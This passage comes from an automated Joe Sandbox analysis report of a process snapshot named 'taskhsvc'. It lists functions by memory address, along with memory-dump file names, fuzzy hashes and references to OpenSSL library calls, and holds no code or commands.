                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$O_snprintfstrlen
                                                            • String ID: @
                                                            • API String ID: 1723301650-2766056989
                                                            • Opcode ID: 12a7f8b0226f6cafa48f786183e43e4805f833575672391a97f6a1e4b7bc3c75
                                                            • Instruction ID: db33ae0bc39bceb8bf2768211147eccfad91cf678b9cb013363685f9cc74af0a
                                                            • Opcode Fuzzy Hash: 12a7f8b0226f6cafa48f786183e43e4805f833575672391a97f6a1e4b7bc3c75
                                                            • Instruction Fuzzy Hash: 49B110B0A083059FD710DF29C48079ABBF5EF85348F62C91DE8988B750D779E946CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEBC4B0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C
                                                            • API String ID: 1767461275-1037565863
                                                            • Opcode ID: d4a775facdcceb7d21200caef1eba999ea16f6bc1ddafcd073cbc9b7231e9e50
                                                            • Instruction ID: 3f7916274eff846b1d7b1fb1d64185293efb03e0d696a42156a79de434bf3589
                                                            • Opcode Fuzzy Hash: d4a775facdcceb7d21200caef1eba999ea16f6bc1ddafcd073cbc9b7231e9e50
                                                            • Instruction Fuzzy Hash: 7991E035618A409FDB50EF39C240A5AB7F1FB89318F42991CE6A8AB704D731F905CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF72410 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc
                                                            • String ID: s$v
                                                            • API String ID: 1457121658-3782752948
                                                            • Opcode ID: a38b26ef099a85d83c5b31bcb66c24453b3723df60c9fadcc3adf9779dd37c30
                                                            • Instruction ID: ef6073e6f78244eb370c7f0dd1eb1fbacf4274cfd6aea42196b41cc3b277e314
                                                            • Opcode Fuzzy Hash: a38b26ef099a85d83c5b31bcb66c24453b3723df60c9fadcc3adf9779dd37c30
                                                            • Instruction Fuzzy Hash: E4612775619701DFDB50DF25D684A4BBBF1BB89348F42981DEAA49B700D331E805CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF6EEF0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 165COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CRYPTO_malloc.LIBEAY32(?,?,?,?,?,?,?,00000000,?,00000000,00000000,6CF6BA8F), ref: 6CF6EF37
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc
                                                            • String ID: g
                                                            • API String ID: 1457121658-30677878
                                                            • Opcode ID: 40958b0451e5804babae5f9365ebe4e6a753ba73e47df7a6987a1e6c5ba16cb8
                                                            • Instruction ID: ac97165d9f8720b84606e6b82fe24f9abb234094028bcadaaf091f595b751ec7
                                                            • Opcode Fuzzy Hash: 40958b0451e5804babae5f9365ebe4e6a753ba73e47df7a6987a1e6c5ba16cb8
                                                            • Instruction Fuzzy Hash: 8B516C725197059FCB10DF26D98064BBBF4FB89308F06891DE6945BB00D731B94A8BD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEF4F80 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ENGINE_init.LIBEAY32 ref: 6CEF4FB9
                                                              • Part of subcall function 6CEBD570: CRYPTO_lock.LIBEAY32(?,?,?,?,00000000,?,6CE9E6CC), ref: 6CEBD5AB
                                                              • Part of subcall function 6CEBD570: CRYPTO_lock.LIBEAY32(?,?,?,?,00000000,?,6CE9E6CC), ref: 6CEBD5E2
                                                            • ENGINE_get_pkey_meth.LIBEAY32 ref: 6CEF4FCD
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CEF4FF3
                                                            • ENGINE_get_pkey_meth_engine.LIBEAY32 ref: 6CEF5073
                                                            • sk_find.LIBEAY32 ref: 6CEF509E
                                                            • OBJ_bsearch_.LIBEAY32 ref: 6CEF50D2
                                                            • ERR_put_error.LIBEAY32 ref: 6CEF5187
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$E_get_pkey_methE_get_pkey_meth_engineE_initJ_bsearch_O_mallocR_put_errorsk_find
                                                            • String ID: A
                                                            • API String ID: 2147540215-3554254475
                                                            • Opcode ID: 13fde9a4f22fdb2d7e8794940bc6e8df3f55596c14dc35df34c4b2e3e63977f1
                                                            • Instruction ID: 6612de9bfc085d737fffe8493af9c6852e4f3b0450b2206597450613a0a01e80
                                                            • Opcode Fuzzy Hash: 13fde9a4f22fdb2d7e8794940bc6e8df3f55596c14dc35df34c4b2e3e63977f1
                                                            • Instruction Fuzzy Hash: EB512AB160A7029FE7009F25C58475BBBF4AF81348F61C92CD4A88BB40E779D54ACF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF72850 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeO_malloc$O_printf$N1_item_i2dN1_item_i2d_bioO_newO_s_memT_it__stack_chk_fail
                                                            • String ID: x
                                                            • API String ID: 3979484556-2363233923
                                                            • Opcode ID: 759d2fc121a8a16b4aa0c9e0ee35f09c62615e4fa763af299feb4843001f3559
                                                            • Instruction ID: 6a68910f970dd9a5e31bc5c9e72469bec628dd84758ea5a6dcf52fb1f08fe5c2
                                                            • Opcode Fuzzy Hash: 759d2fc121a8a16b4aa0c9e0ee35f09c62615e4fa763af299feb4843001f3559
                                                            • Instruction Fuzzy Hash: D44106B1608705CBDB10DF25D58429FBBF4AF84348F16882EE8D88BB10E776D444DBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF78880 Relevance: 28.7, APIs: 19, Instructions: 226COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 812f1abc50ac869a83d12fcdcaac6d1e571bc0da1d95bb51cb1cd972619cd423
                                                            • Instruction ID: b19e5409589f02c239d7512492c2388722c108ff4ec4a352809ca6592b0db45c
                                                            • Opcode Fuzzy Hash: 812f1abc50ac869a83d12fcdcaac6d1e571bc0da1d95bb51cb1cd972619cd423
                                                            • Instruction Fuzzy Hash: D7A16D31618B018FDB20DF29D54065BBBF1FB89318F02891EE6A5AB740D731E904CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF7C520 Relevance: 28.7, APIs: 19, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
